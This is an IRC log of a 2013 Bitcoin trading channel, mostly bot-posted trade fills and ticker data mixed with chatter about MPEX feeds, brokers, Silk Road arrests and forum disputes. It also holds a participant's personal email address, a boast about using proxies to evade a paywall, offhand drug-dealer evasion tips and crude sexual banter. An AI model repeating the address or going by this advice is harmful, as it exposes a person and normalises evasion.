assbot Feb 04 01:43:19 Guys, I will glue my recently deceased iPod touch on the ground in front of walmart and record video of people trying to pick it up Feb 04 01:43:27 *note: i gould be completely wrong Feb 04 01:43:43 Bowjov: when :) Feb 04 01:44:19 when my buddies are free. ill get on his car and record it from a distance Feb 04 01:44:37 I'll put it on youtube and stuff Feb 04 01:44:38 lol Feb 04 01:45:06 How do you plan to secretly glue it? pretend to just be sitting on the ground while actually sitting on the ipod while it bonds? Feb 04 01:45:33 it pushes to assbot Feb 04 01:45:44 I will put the ipod face down yeah, I can step on it while it binds Feb 04 01:45:44 switched a few weeks ago, was announced here too Feb 04 01:46:04 I'll put it at a sidewalk so that not too many people will see it Feb 04 01:49:12 i like coinbases locking in your price (can't use my money but at least i'm not losing it) Feb 04 01:49:23 and i meant can't use it cuz of four day clearing over the weekend Feb 04 01:50:16 mircea_popescu: is there a public-facing API that streams MPEX trades? Feb 04 01:50:47 other than twitter and assbot no Feb 04 01:51:13 i didn't know you worked on mpex agent smickles Feb 04 01:51:17 very cool Feb 04 01:58:17 i really like you guys code a lot Feb 04 01:58:50 mjr_: did I? Feb 04 01:59:00 i did a little for pympex Feb 04 01:59:07 saw something by you (i think) on github Feb 04 01:59:23 yeah, that is used in mpexagent Feb 04 01:59:24 oh, i forked it and played with the code a little Feb 04 01:59:35 but looks really cool Feb 04 02:00:02 pizzaman1337, there is rss on mpex.co Feb 04 02:00:13 not exactly streaming but i found it most reliable Feb 04 02:00:18 !ticker m s.mpoe Feb 04 02:00:19 by the way, has anyone tried github for windows? Feb 04 02:00:20 [MPEX:S.MPOE] 1D: 0.00066495 / 0.00068502 / 0.0007 (3488379 shares, 2,389.64 BTC), 7D: 0.00063335 / 0.00066713 / 0.0007 (14293199 shares, 9,535.52 BTC), 30D: 0.00059445 / 0.00065926 / 0.0007 (58477262 shares, 38,551.76 BTC) Feb 04 02:00:23 jurov: I saw that, was hoping for something streaming Feb 04 02:00:27 its kinda awesome i have to admit Feb 04 02:00:37 the rss feed would be xml? Feb 04 02:00:44 yes Feb 04 02:01:00 hate mixing json and xml... Feb 04 02:02:10 how would you mix it? Feb 04 02:02:50 i mean accepting one feed from xml and one feed from json Feb 04 02:02:54 and having to parse both Feb 04 02:03:00 like depth of book is offered as json Feb 04 02:03:04 and executions are xml Feb 04 02:03:10 :-/ Feb 04 02:03:46 you just call rss parser library in one line Feb 04 02:04:01 no fuss Feb 04 02:04:05 tbh i haven't used much xml, but is it as easy to get objects? Feb 04 02:04:24 it spits out a python object? Feb 04 02:04:31 or a dict... Feb 04 02:04:54 yes, a nested dict Feb 04 02:04:59 oh ok cool Feb 04 02:05:09 i guess it won't be that hard Feb 04 02:05:11 i can send you mpexrss.py sample Feb 04 02:05:17 oh thanks Feb 04 02:05:27 where? Feb 04 02:05:30 maximojoshuarossi@gmail.com Feb 04 02:05:59 lol, i care a LOT about anonymity Feb 04 02:08:38 i have been disconnecting randomly Feb 04 02:08:40 i don't know why Feb 04 02:09:11 sent Feb 04 02:09:18 thanks Feb 04 02:09:31 i guess you can get your own stuff with a statjson Feb 04 02:09:33 right? Feb 04 02:10:07 but if you want to see all executions you have to go to rss Feb 04 02:11:00 i didn't quit Feb 04 02:11:02 right Feb 04 02:11:20 oh lol, that was my old nick that dc's Feb 04 02:12:08 i'm definitely gonna need to get some orders in on thursday i think Feb 04 02:12:11 i will be using coinbr Feb 04 02:12:25 bitcoincharts down now for a change Feb 04 02:13:08 like, are mtgox/bitcoincharts/blockchain on the same hw? Feb 04 02:13:16 bitcoin decentralization ftw Feb 04 02:13:20 thats what i call redundant Feb 04 02:13:21 lol Feb 04 02:13:46 i'm surprised that mt. gox at least doesn't have a cluster Feb 04 02:14:02 vmware can literally not miss a ping if a server blows up Feb 04 02:15:33 so, still not sure how you send orders on coinbr...is it manual? or does the web interface appear once funded Feb 04 02:19:40 [MPEX] [S.MPOE] 24800 @ 0.0007 = 17.36 BTC [+] Feb 04 02:21:11 mjr_ yes once funded, "new order" link appears Feb 04 02:21:18 ah ok cool Feb 04 02:21:28 i put link to screenshots on frontpage Feb 04 02:21:32 look forward to it Feb 04 02:21:38 [BTCTC] [B.YABMC] 1 @ 0.0249 BTC [+] Feb 04 02:21:49 i may try one of those cash things like bitinstant on monday Feb 04 02:21:56 can't wait till thursday lol Feb 04 02:22:21 mjr_, are you going to fund today? since i'm preparing to haul stuff to mpex Feb 04 02:22:37 no, thursday at the latest Feb 04 02:22:49 but if i can find a way to get btc tomorrow i am going to Feb 04 02:25:24 apparently that was not allowed. you just go on, mjr_ Feb 04 02:25:26 :) Feb 04 02:25:51 what was not allowed? Feb 04 02:26:24 i think I just got booted Feb 04 02:26:27 not sure why Feb 04 02:27:00 srsly though, how have you maintained this level of interaction continuous throughout the day? Feb 04 02:27:06 i'm amazed Feb 04 02:27:29 mostly jealous Feb 04 02:27:35 dinnertime Feb 04 02:28:53 mostly bored, and this is the most interesting thing i have found in a very long time Feb 04 02:28:58 i have some really big plans Feb 04 02:29:54 lol i just found girls go bitcoin Feb 04 02:30:17 i did not know that there were girls who knew what they were hahaha Feb 04 02:30:17 i'm just kidding Feb 04 02:38:17 [HAVELOCK] [SDICE] 1 @ 0.765 BTC [+] Feb 04 02:40:18 [HAVELOCK] [SDICE] 1 @ 0.765 BTC [+] Feb 04 02:46:15 okay, goodnight Feb 04 02:47:08 cya Feb 04 02:48:34 oh kakobreklaa did you resolve the probs with assbot? Feb 04 02:48:48 i thought i already did. Feb 04 02:50:05 heh Feb 04 02:51:09 !ticker m s.mpoe Feb 04 02:51:11 [MPEX:S.MPOE] 1D: 0.00066495 / 0.00068533 / 0.0007 (3522396 shares, 2,414.00 BTC), 7D: 0.00063335 / 0.00066731 / 0.0007 (14324786 shares, 9,559.11 BTC), 30D: 0.00059445 / 0.00065932 / 0.0007 (58486207 shares, 38,561.60 BTC) Feb 04 02:51:13 ok so Feb 04 02:51:27 the old vwap was just replaced with a new, much faster, lighter version Feb 04 02:51:55 whats the diff Feb 04 02:53:31 ;;bc,stats Feb 04 02:53:33 Current Blocks: 219503 | Current Difficulty: 2968775.3320751 | Next Difficulty At Block: 219743 | Next Difficulty In: 240 blocks | Next Difficulty In About: 1 day, 10 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: 3252722.00578067 | Estimated Percent Change: 9.56443792286 Feb 04 02:53:42 ;;bc,diffchange Feb 04 02:53:43 Estimated percent change in difficulty this period | 9.56443792286 % based on data since last change | 15.3622764814 % based on data for last three days Feb 04 02:55:31 well for one thing it only lists the symbols which had activity at all Feb 04 02:55:46 and under the hood muchly optimised sqling Feb 04 02:56:07 dont bother us if its not 250x faster. Feb 04 02:57:07 very cool Feb 04 02:57:21 anyways, i will talk to you all later monday should be fun Feb 04 02:57:38 it's about 18x faster i think Feb 04 02:58:17 [HAVELOCK] [SDICE] 10 @ 0.765 = 7.65 BTC [+] Feb 04 03:02:22 http://www.youtube.com/watch?v=RWuCmjpvXmE Feb 04 03:02:36 http://shrani.si/f/3z/OV/4lb6Z4Bi/critpred.png Feb 04 03:02:38 hehe Feb 04 03:04:17 what's that ? Feb 04 03:04:37 o hey! pretty good Feb 04 03:05:27 critticall + btc price per diff change Feb 04 03:05:29 so 45 by spring ? Feb 04 03:05:39 http://pastebin.com/raw.php?i=VQdpYEMK Feb 04 03:06:27 its very raw Feb 04 03:06:45 been only doing ai evolution for about 24hrs Feb 04 03:07:11 need more time and better data Feb 04 03:08:04 wait ill extend the red prediction Feb 04 03:08:11 to see how well it matches green one Feb 04 03:09:20 brb Feb 04 03:09:25 kakobreklaa: what is that for Feb 04 03:09:26 ?* Feb 04 03:16:50 [BTCTC] [BTC-MINING] 1 @ 0.4799 BTC [-] Feb 04 03:18:07 Should I just freeze BTC-MINING trading? Feb 04 03:18:21 Until issues with Amazingrando are resolved? Feb 04 03:18:39 what's freezing accomplish ? Feb 04 03:18:53 [BTCTC] [RSM] 100 @ 0.01 = 1 BTC [-] Feb 04 03:19:04 Prevent people from inadvertantly buying something possibly worthless? Feb 04 03:19:29 also prevent people from selling at a loss/buying at a risk. Feb 04 03:19:46 Actually I should probably post some status on the situation and let people buy/sell according to their expectation of amazingrando paying out I guess. Feb 04 03:19:50 this freezing business is more of the glbse nuttery imo. Feb 04 03:20:12 discontinue it is one thing. freezing it is neither here nor here. Feb 04 03:20:15 there* Feb 04 03:22:21 Well there's always the link to the thread I suppose Feb 04 03:23:10 [MPEX] [S.MPOE] 14845 @ 0.0007 = 10.3915 BTC [+] Feb 04 03:23:13 [MPEX] [S.MPOE] 6047 @ 0.00069314 = 4.1914 BTC [-] Feb 04 03:23:17 [MPEX] [S.MPOE] 7500 @ 0.0007 = 5.25 BTC [+] Feb 04 03:23:19 [MPEX] [S.MPOE] 7573 @ 0.00069999 = 5.301 BTC [-] Feb 04 03:27:43 [MPEX] [S.MPOE] 6000 @ 0.0007 = 4.2 BTC [+] Feb 04 03:28:10 [MPEX] [S.DICE] 195 @ 0.0073419 = 1.4317 BTC [+] **** BEGIN LOGGING AT Mon Feb 4 10:40:42 2013 Feb 04 10:51:19 [HAVELOCK] [SDICE] 1 @ 0.765 BTC [+] Feb 04 11:05:26 [MPEX] [S.MPOE] 4321 @ 0.00069111 = 2.9863 BTC [+] Feb 04 11:05:29 [MPEX] [S.MPOE] 11034 @ 0.00069128 = 7.6276 BTC [+] Feb 04 11:11:27 [MPEX] [S.MPOE] 4321 @ 0.0006901 = 2.9819 BTC [-] Feb 04 11:11:29 [MPEX] [S.MPOE] 932 @ 0.00069001 = 0.6431 BTC [-] Feb 04 11:11:31 [MPEX] [S.MPOE] 3047 @ 0.00069 = 2.1024 BTC [-] Feb 04 11:22:20 [MPEX] [S.DICE] 600 @ 0.007301 = 4.3806 BTC [+] Feb 04 11:22:23 [MPEX] [S.DICE] 600 @ 0.00731325 = 4.388 BTC [+] Feb 04 11:22:50 ha! for the record, that wasn't an echo! Feb 04 11:33:44 [MPEX] [S.MPOE] 4321 @ 0.00069107 = 2.9861 BTC [+] Feb 04 11:33:49 [MPEX] [S.MPOE] 3807 @ 0.00069128 = 2.6317 BTC [+] Feb 04 11:36:53 !ticker mpex s.dice Feb 04 11:36:55 [MPEX:S.DICE] 1D: 0.00718504 / 0.0073726 / 0.007395 (191681 shares, 1,413.19 BTC), 7D: 0.00534524 / 0.00731123 / 0.00749999 (698962 shares, 5,110.27 BTC), 30D: 0.00085848 / 0.00512667 / 0.0075 (6020786 shares, 30,866.61 BTC) Feb 04 11:37:15 o hey, it was the 3rd Feb 04 11:37:17 no big moves. Feb 04 11:37:45 [BTCTC] [B.YABMC] 521 @ 0.0249 = 12.9729 BTC [+] Feb 04 11:41:36 [MPEX] [S.MPOE] 4321 @ 0.00069035 = 2.983 BTC [-] Feb 04 11:41:40 [MPEX] [S.MPOE] 3379 @ 0.00069 = 2.3315 BTC [-] Feb 04 11:43:51 [BTCTC] [BTC-BOND] 8 @ 0.0097 = 0.0776 BTC [-] Feb 04 11:44:18 [MPEX] [S.DICE] 450 @ 0.00731325 = 3.291 BTC [+] Feb 04 11:44:27 [BTCTC] [B.YABMC] 3 @ 0.025 = 0.075 BTC [+] Feb 04 11:45:33 [BTCTC] [B.YABMC] 5 @ 0.025 = 0.125 BTC [+] Feb 04 11:45:57 [BTCTC] [B.YABMC] 10 @ 0.026 = 0.26 BTC [+] Feb 04 11:48:38 [MPEX] [S.MPOE] 4000 @ 0.00069 = 2.76 BTC [-] Feb 04 11:49:10 [MPEX] [X.IDIFF.JUN] 250 @ 0.08995 = 22.4875 BTC [-] Feb 04 11:53:27 that's a bold bet. Feb 04 12:01:24 [MPEX] [S.MPOE] 2626 @ 0.00069128 = 1.8153 BTC [+] Feb 04 12:01:27 [MPEX] [S.MPOE] 4321 @ 0.00069548 = 3.0052 BTC [+] Feb 04 12:01:29 [MPEX] [S.MPOE] 4398 @ 0.00069549 = 3.0588 BTC [+] Feb 04 12:10:47 [BTCTC] [B.YABMC] 2 @ 0.023 = 0.046 BTC [-] Feb 04 12:16:37 [MPEX] [S.MPOE] 4321 @ 0.00069028 = 2.9827 BTC [-] Feb 04 12:16:39 [MPEX] [S.MPOE] 20379 @ 0.00069001 = 14.0617 BTC [-] Feb 04 12:18:12 [MPEX] [S.MPOE] 9000 @ 0.00069001 = 6.2101 BTC [-] Feb 04 12:29:34 [MPEX] [S.MPOE] 13300 @ 0.00069001 = 9.1771 BTC [-] Feb 04 13:12:09 [MPEX] [S.MPOE] 3150 @ 0.00069525 = 2.19 BTC [+] Feb 04 13:14:20 [MPEX] [S.MPOE] 2150 @ 0.00069001 = 1.4835 BTC [-] Feb 04 13:15:09 [MPEX] [S.MPOE] 4200 @ 0.00069001 = 2.898 BTC [-] Feb 04 13:17:19 [HAVELOCK] [KCIM] 3 @ 1 = 3 BTC [+] Feb 04 13:18:19 [HAVELOCK] [SDICE] 1 @ 0.765 BTC [+] Feb 04 13:21:18 [HAVELOCK] [SDICE] 1 @ 0.76 BTC [-] Feb 04 13:21:47 [MPEX] [S.MPOE] 3150 @ 0.00069001 = 2.1735 BTC [-] Feb 04 13:28:35 [MPEX] [S.MPOE] 1100 @ 0.00069058 = 0.7596 BTC [+] Feb 04 13:35:30 [MPEX] [S.MPOE] 5600 @ 0.00069001 = 3.8641 BTC [-] Feb 04 13:37:21 [MPEX] [S.MPOE] 8300 @ 0.00069058 = 5.7318 BTC [+] Feb 04 13:37:23 [MPEX] [S.MPOE] 4000 @ 0.00069483 = 2.7793 BTC [+] Feb 04 13:37:25 [MPEX] [S.MPOE] 1900 @ 0.00069549 = 1.3214 BTC [+] Feb 04 13:41:55 asciilifeform you'll prolly enjoy this : http://trilema.com/2013/stage-n-bitcoin-exists/ Feb 04 13:45:25 [HAVELOCK] [KCIM] 6 @ 1 = 6 BTC [+] Feb 04 13:57:34 lol http://www.dilbert.com/2013-02-04/ Feb 04 13:58:28 lmao Feb 04 14:17:54 [MPEX] [S.MPOE] 17200 @ 0.00069051 = 11.8768 BTC [-] Feb 04 14:21:55 [MPEX] [S.MPOE] 11800 @ 0.00069051 = 8.148 BTC [-] Feb 04 14:32:20 [HAVELOCK] [SDICE] 2 @ 0.76 = 1.52 BTC [-] Feb 04 14:44:31 [MPEX] [S.DICE] 1000 @ 0.0072934 = 7.2934 BTC [-] Feb 04 14:44:33 [MPEX] [S.DICE] 91 @ 0.00724667 = 0.6594 BTC [-] Feb 04 14:48:33 [MPEX] [S.MPOE] 1171 @ 0.00069135 = 0.8096 BTC [+] Feb 04 14:48:35 [MPEX] [S.MPOE] 10479 @ 0.00069137 = 7.2449 BTC [+] Feb 04 14:51:18 [MPEX] [S.MPOE] 1021 @ 0.00069137 = 0.7059 BTC [+] Feb 04 14:51:20 [MPEX] [S.MPOE] 2362 @ 0.00069549 = 1.6427 BTC [+] Feb 04 14:55:12 [MPEX] [S.MPOE] 5464 @ 0.00069549 = 3.8002 BTC [+] Feb 04 14:55:20 [MPEX] [S.MPOE] 3744 @ 0.00069653 = 2.6078 BTC [+] Feb 04 14:59:51 https://www.cryptospora.net/bitcoin-graph.html lol i must to do something like that for mpex Feb 04 15:00:05 aka "look, mpoe-pr peed on the chart" Feb 04 15:02:55 [MPEX] [S.DICE] 1189 @ 0.00731325 = 8.6955 BTC [+] Feb 04 15:03:36 [MPEX] [S.MPOE] 4321 @ 0.00069071 = 2.9846 BTC [-] Feb 04 15:03:38 [MPEX] [S.MPOE] 8911 @ 0.00069051 = 6.1531 BTC [-] Feb 04 15:07:22 [MPEX] [S.MPOE] 814 @ 0.00069051 = 0.5621 BTC [-] Feb 04 15:07:24 [MPEX] [S.MPOE] 7336 @ 0.00069001 = 5.0619 BTC [-] Feb 04 15:09:24 [MPEX] [S.DICE] 400 @ 0.00724668 = 2.8987 BTC [-] Feb 04 15:23:30 A 15000 BTC wall at 21? Dang! Feb 04 15:26:28 [MPEX] [S.MPOE] 24100 @ 0.00069001 = 16.6292 BTC [-] Feb 04 15:31:34 heh Feb 04 15:32:14 [MPEX] [S.MPOE] 4321 @ 0.00069619 = 3.0082 BTC [+] Feb 04 15:32:16 [MPEX] [S.MPOE] 7179 @ 0.00069653 = 5.0004 BTC [+] Feb 04 15:34:32 [MPEX] [S.MPOE] 4321 @ 0.00069034 = 2.983 BTC [-] Feb 04 15:34:33 [MPEX] [S.MPOE] 4229 @ 0.00069001 = 2.9181 BTC [-] Feb 04 15:35:39 [MPEX] [S.MPOE] 1077 @ 0.00069653 = 0.7502 BTC [+] Feb 04 15:35:41 [MPEX] [S.MPOE] 3600 @ 0.0006967 = 2.5081 BTC [+] Feb 04 15:35:42 [MPEX] [S.MPOE] 2023 @ 0.0006987 = 1.4135 BTC [+] Feb 04 15:43:29 [MPEX] [S.MPOE] 2298 @ 0.0006987 = 1.6056 BTC [+] Feb 04 15:43:31 [MPEX] [S.MPOE] 4761 @ 0.00069871 = 3.3266 BTC [+] Feb 04 15:43:37 [MPEX] [S.MPOE] 3941 @ 0.00069953 = 2.7568 BTC [+] Feb 04 15:45:02 [MPEX] [S.MPOE] 2700 @ 0.00069953 = 1.8887 BTC [+] Feb 04 15:55:34 [MPEX] [S.DICE] 500 @ 0.00731324 = 3.6566 BTC [+] Feb 04 15:55:35 [MPEX] [S.DICE] 750 @ 0.00731325 = 5.4849 BTC [+] Feb 04 16:02:02 [MPEX] [S.MPOE] 16743 @ 0.00069953 = 11.7122 BTC [+] Feb 04 16:09:45 [MPEX] [S.DICE] 111 @ 0.00731325 = 0.8118 BTC [+] Feb 04 16:09:47 [MPEX] [S.DICE] 1412 @ 0.00731333 = 10.3264 BTC [+] Feb 04 16:09:50 [MPEX] [S.DICE] 1234 @ 0.00734038 = 9.058 BTC [+] Feb 04 16:09:52 [MPEX] [S.DICE] 1143 @ 0.007347 = 8.3976 BTC [+] Feb 04 16:12:15 [MPEX] [S.MPOE] 4321 @ 0.00069018 = 2.9823 BTC [-] Feb 04 16:12:17 [MPEX] [S.MPOE] 679 @ 0.00069001 = 0.4685 BTC [-] Feb 04 16:19:19 [HAVELOCK] [SDICE] 15 @ 0.76252525 = 11.4379 BTC [+] Feb 04 16:24:15 http://arstechnica.com/tech-policy/2013/02/police-crack-down-on-silk-road-following-first-drug-dealer-conviction/ Feb 04 16:24:23 aaaand there it goes. Feb 04 16:25:10 man, those police are going to be pissed when they find out it was an FBI agent they arrested Feb 04 16:25:19 [HAVELOCK] [SDICE] 235 @ 0.76252525 = 179.1934 BTC [+] Feb 04 16:25:33 mircea_popescu: that guy got busted for breaking drug dealing protocol Feb 04 16:25:54 the seller didn't get nabbed so it's kind of a moot point, since he can't really snitch Feb 04 16:25:56 how do you do that Feb 04 16:26:00 sell too cheap? Feb 04 16:26:10 you deal from your home Feb 04 16:26:32 ya well... Feb 04 16:26:38 business and home need to be kept separate in that lifetime Feb 04 16:26:43 lifestyle* Feb 04 16:27:12 They also found two working mobile phones, and forensically analyzed more than 20,000 text messages. In among them were incriminating texts such as "I got five grand worth if you want" and "promote the LSD I got more in. I sold 200 cubes last week". Feb 04 16:27:38 herpderp Feb 04 16:28:12 not everyone can send gpg encrypted email to clientelle :P Feb 04 16:28:35 actually the people who deal dope and the people who use gpg are like oil and water it seems. Feb 04 16:28:58 use dope* Feb 04 16:29:28 [MPEX] [S.MPOE] 4321 @ 0.00069798 = 3.016 BTC [+] Feb 04 16:29:30 [MPEX] [S.MPOE] 10679 @ 0.0006981 = 7.455 BTC [+] Feb 04 16:29:33 silk road dope dealers never seemed to get busted despite the dea purportedly having a budget just for that investigation Feb 04 16:35:10 [MPEX] [S.MPOE] 831 @ 0.0006981 = 0.5801 BTC [+] Feb 04 16:35:12 [MPEX] [S.MPOE] 12398 @ 0.00069953 = 8.6728 BTC [+] Feb 04 16:35:36 http://arstechnica.com/tech-policy/2013/01/new-lawsuit-against-revenge-porn-site-also-targets-godaddy/ - that article is much more interesting mr. popescu Feb 04 16:36:02 revenge pronsite ? Feb 04 16:36:08 yeaaa boy Feb 04 16:36:58 and ofcourse godaddy would be targeted. only way to make money. Feb 04 16:38:43 [MPEX] [S.MPOE] 4321 @ 0.00069012 = 2.982 BTC [-] Feb 04 16:38:45 [MPEX] [S.MPOE] 1279 @ 0.00069001 = 0.8825 BTC [-] Feb 04 16:39:10 http://isanybodydown.com/ heh Feb 04 16:39:11 i see. Feb 04 16:40:03 its a porn site?! Feb 04 16:40:19 yea Feb 04 16:40:31 mircea_popescu you should turn /dtng/ into something like that Feb 04 16:40:37 more profitable ;) Feb 04 16:40:56 dtng isn't making any money. Feb 04 16:41:21 so then it will make money when revengeporn is posted? Feb 04 16:41:26 via extortion? (i kid) Feb 04 16:41:54 it's just there cause sometime x years ago i got fucking tired of bs image hosting services on web Feb 04 16:44:41 mircea_popescu: what if some of the whales on mpex are drug lords and store their profits in MPEX assets...? Feb 04 16:44:45 does that matter to you? Feb 04 16:44:50 [MPEX] [S.MPOE] 4321 @ 0.00069064 = 2.9843 BTC [+] Feb 04 16:44:52 [MPEX] [S.MPOE] 8379 @ 0.00069081 = 5.7883 BTC [+] Feb 04 16:45:00 well, what if the moon is made of cheeze ? does that matter to you ? Feb 04 16:45:30 no? I was just wondering, because that's what lawyers want to use to "negafy" bitcoin... Feb 04 16:46:23 a bitcoin is a bitcoin. Feb 04 16:46:29 drug lording is entirely a fiat problem Feb 04 16:46:32 a dollar is a dollar Feb 04 16:46:41 not with silk road... Feb 04 16:46:47 thestringpuller, never ran into "polimedia premium" second paywall? Feb 04 16:47:04 they seem to do make money from porn :) Feb 04 16:47:15 you just didn't look sufficiently hard Feb 04 16:48:05 i would say pablo escobar would be more likely to dump large amounts of money into bitcoin as opposed to warren buffet Feb 04 16:48:14 it's actually discussed http://trilema.com/trilema-premium/ Feb 04 16:48:26 bottom left of navbar Feb 04 16:48:46 thestringpuller i guess that'd be the problem of the banks or whoever takes his dollars. Feb 04 16:48:57 you need a better paywall, since now I'm just using proxies to scramble the outbound ip :P Feb 04 16:49:05 when i connect to trilema Feb 04 16:49:32 yea, and emir kusturic will make a documentary about mircea Feb 04 16:49:40 :DD Feb 04 16:49:51 goran bregovic should do the soundtrack Feb 04 16:50:02 what would it be, white bitch, black bitch ? Feb 04 16:50:21 long dick, longer dick. Feb 04 16:50:41 o, did you see the pix of my dick ? Feb 04 16:50:51 urlpls Feb 04 16:50:56 ;;google trilema pula mea Feb 04 16:50:57 Stiti voi, dragii mei, ce-i aia taco ? pe Trilema - Un blog de Mircea ...: ; Anunt umanitar pe Trilema - Un blog de Mircea Popescu.: ; Mic tratat de ipocrizie pe Trilema - Un blog de Mircea Popescu.: Feb 04 16:51:05 eh wtf. Feb 04 16:51:14 http://trilema.com/2010/nsfw-pula-mea/ Feb 04 16:51:44 oo, not bad. Feb 04 16:52:15 http://trilema.com/2011/pedofilia-si-raul/#comment-55136 << that's a fine example of why dtng exists Feb 04 16:52:25 put a pic on photobucket or w/e, link it in a comment Feb 04 16:52:38 a ferw months later, "sorry fuck you and here's our site pls to give us jooce" Feb 04 16:52:47 wait what? Feb 04 16:52:54 I can't view that picture from this computer Feb 04 16:53:00 sucks to be you ? Feb 04 16:53:30 [MPEX] [S.MPOE] 1400 @ 0.0006901 = 0.9661 BTC [-] Feb 04 16:53:39 it's confirmed. mircea is an alien Feb 04 16:54:32 because it's in romanian and I don't have a translator on dis computer Feb 04 16:56:05 google translate? Feb 04 17:00:22 basically it says that you can get larger versions of pix i took if you payup Feb 04 17:01:08 kinda lost interest in bothering with prepping pix etc since bitcoin tho Feb 04 17:04:16 [MPEX] [S.MPOE] 2921 @ 0.0006901 = 2.0158 BTC [-] Feb 04 17:04:18 [MPEX] [S.MPOE] 6403 @ 0.00069001 = 4.4181 BTC [-] Feb 04 17:06:40 [MPEX] [S.MPOE] 6800 @ 0.00069001 = 4.6921 BTC [-] Feb 04 17:08:24 [MPEX] [S.MPOE] 1395 @ 0.00069001 = 0.9626 BTC [-] Feb 04 17:08:26 [MPEX] [S.MPOE] 4905 @ 0.00069 = 3.3845 BTC [-] Feb 04 17:11:59 [MPEX] [S.MPOE] 13200 @ 0.00069 = 9.108 BTC [-] Feb 04 17:19:21 [MPEX] [S.MPOE] 2921 @ 0.00069081 = 2.0179 BTC [+] Feb 04 17:22:38 [MPEX] [S.DICE] 257 @ 0.007347 = 1.8882 BTC [+] Feb 04 17:22:42 [MPEX] [S.DICE] 543 @ 0.007395 = 4.0155 BTC [+] Feb 04 17:26:32 how do i invest in s. dice? Feb 04 17:30:10 j1717, you need to buy shares on MPEx. Feb 04 17:30:20 [HAVELOCK] [SDICE] 23 @ 0.75 = 17.25 BTC [-] Feb 04 17:30:32 [MPEX] [S.MPOE] 9429 @ 0.00069825 = 6.5838 BTC [+] Feb 04 17:30:49 j1717: have you seen http://mpex.co/faq.html ? Feb 04 17:31:10 but perhaps you can start by using broker instead: coinbr.com Feb 04 17:32:19 [HAVELOCK] [KCIM] 7 @ 1 = 7 BTC [+] Feb 04 17:32:38 [MPEX] [S.MPOE] 3421 @ 0.00069361 = 2.3728 BTC [-] Feb 04 17:32:40 [MPEX] [S.MPOE] 618 @ 0.00069953 = 0.4323 BTC [+] Feb 04 17:32:41 [MPEX] [S.MPOE] 4321 @ 0.00069998 = 3.0246 BTC [+] Feb 04 17:32:43 [MPEX] [S.MPOE] 2140 @ 0.00069999 = 1.498 BTC [+] Feb 04 17:35:19 [HAVELOCK] [SDICE] 5 @ 0.73 = 3.65 BTC [-] Feb 04 17:36:19 [HAVELOCK] [SDICE] 5 @ 0.715 = 3.575 BTC [-] Feb 04 17:37:20 [MPEX] [S.MPOE] 2887 @ 0.00069352 = 2.0022 BTC [-] Feb 04 17:37:33 no not yet new B to this Feb 04 17:39:26 rthen prolly should take a little time and learn about it all Feb 04 17:42:57 [MPEX] [S.MPOE] 7500 @ 0.00069999 = 5.2499 BTC [+] Feb 04 17:43:44 30 btc just sign up ? Feb 04 17:44:23 ofc Feb 04 17:45:32 i ave a bit coin wallet but it is trying to charge a fee i thought that this was free Feb 04 17:45:39 on mpex, yes. there's passthroughs on bitfunder, havelock and btctc, and there's brokers (like coinbr.com, as a site, like smickles as aperson) that can also help you Feb 04 17:45:41 you can buy them elsewhere, bitfunder is probably the best site for you Feb 04 17:46:48 "MPOE-PR, you can class action your parents if you had enough people in the suit." Feb 04 17:46:53 https://bitcointalk.org/index.php?topic=140927.msg1502894#msg1502894 Feb 04 17:47:00 this guy is taking it to a whole new level. Feb 04 17:48:03 me too. i don't remember myself ever using such stern tone... https://bitcointalk.org/index.php?topic=76506.msg1502953#msg1502953 Feb 04 17:51:10 what, they've not done anything yet ? Feb 04 17:51:43 i'm not aware of. Feb 04 17:52:29 heh. maybe their plan is to just wait for the delisting and pay something then Feb 04 17:52:42 tho it'd be great if they just announced what they plan to do Feb 04 17:53:27 zactly. Feb 04 17:54:58 forums: meh Feb 04 17:58:20 [HAVELOCK] [SDICE] 2 @ 0.74 = 1.48 BTC [+] Feb 04 18:01:44 [MPEX] [S.MPOE] 2660 @ 0.00069416 = 1.8465 BTC [-] Feb 04 18:01:45 [MPEX] [S.MPOE] 11740 @ 0.000697 = 8.1828 BTC [+] Feb 04 18:03:03 [MPEX] [S.MPOE] 1810 @ 0.000697 = 1.2616 BTC [+] Feb 04 18:04:47 [MPEX] [S.MPOE] 10541 @ 0.00069999 = 7.3786 BTC [+] Feb 04 18:04:49 [MPEX] [S.MPOE] 12759 @ 0.00069999 = 8.9312 BTC [+] Feb 04 18:06:34 [BTCTC] [B.YABMC] 1 @ 0.0279 BTC [+] Feb 04 18:07:31 hrm - so it seems Avalon batch #2 orders was a fiasco Feb 04 18:07:39 thankfully missed that drama Feb 04 18:11:46 was pretty hot and heavy Feb 04 18:12:33 fiasco is an understatement Feb 04 18:14:53 class action suit with walletbit Feb 04 18:14:56 TWF Feb 04 18:14:58 err Feb 04 18:15:00 WTF Feb 04 18:15:12 lol Feb 04 18:15:35 JWU_42 expert says he can action suit his mom. Feb 04 18:17:28 [MPEX] [S.MPOE] 4950 @ 0.00069736 = 3.4519 BTC [-] Feb 04 18:17:31 [MPEX] [S.MPOE] 14900 @ 0.00069999 = 10.4299 BTC [+] Feb 04 18:18:09 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1195 = 0.239 BTC [-] Feb 04 18:18:15 [BTCTC] [BTC-TRADING-PT] 40 @ 0.1196 = 4.784 BTC [+] Feb 04 18:19:34 evening :D Feb 04 18:22:28 [MPEX] [S.MPOE] 1434 @ 0.00069352 = 0.9945 BTC [-] Feb 04 18:22:30 [MPEX] [S.MPOE] 2131 @ 0.00069334 = 1.4775 BTC [-] Feb 04 18:37:03 [MPEX] [S.MPOE] 66 @ 0.000695 = 0.0459 BTC [+] Feb 04 18:38:20 [BTCTC] [GSDPT] 257 @ 0.0076 = 1.9532 BTC [+] Feb 04 18:44:09 [MPEX] [S.MPOE] 8634 @ 0.000695 = 6.0006 BTC [+] Feb 04 18:44:11 [MPEX] [S.MPOE] 2766 @ 0.00069975 = 1.9355 BTC [+] Feb 04 18:45:16 [MPEX] [O.BTCUSD.P210T] 750 @ 0.2040166 = 153.0125 BTC [+] Feb 04 18:51:45 mircea_popescu: we are quite litigious here in the US Feb 04 18:51:59 ;) Feb 04 18:52:05 im litigious too. the difference is i actually file. Feb 04 18:52:31 heh - yeah - much talk and little action in these things generally Feb 04 18:54:30 [MPEX] [S.DICE] 1250 @ 0.007395 = 9.2438 BTC [+] Feb 04 18:55:04 to everyone who likes monkey patching by editing files on live server: http://feross.org/cmsploit/?hn=1 Feb 04 18:59:49 [BTCTC] [ESECURITYSABTC] 1 @ 0.721 BTC [+] Feb 04 19:00:25 [BTCTC] [BASIC-MINING] 3 @ 0.35 = 1.05 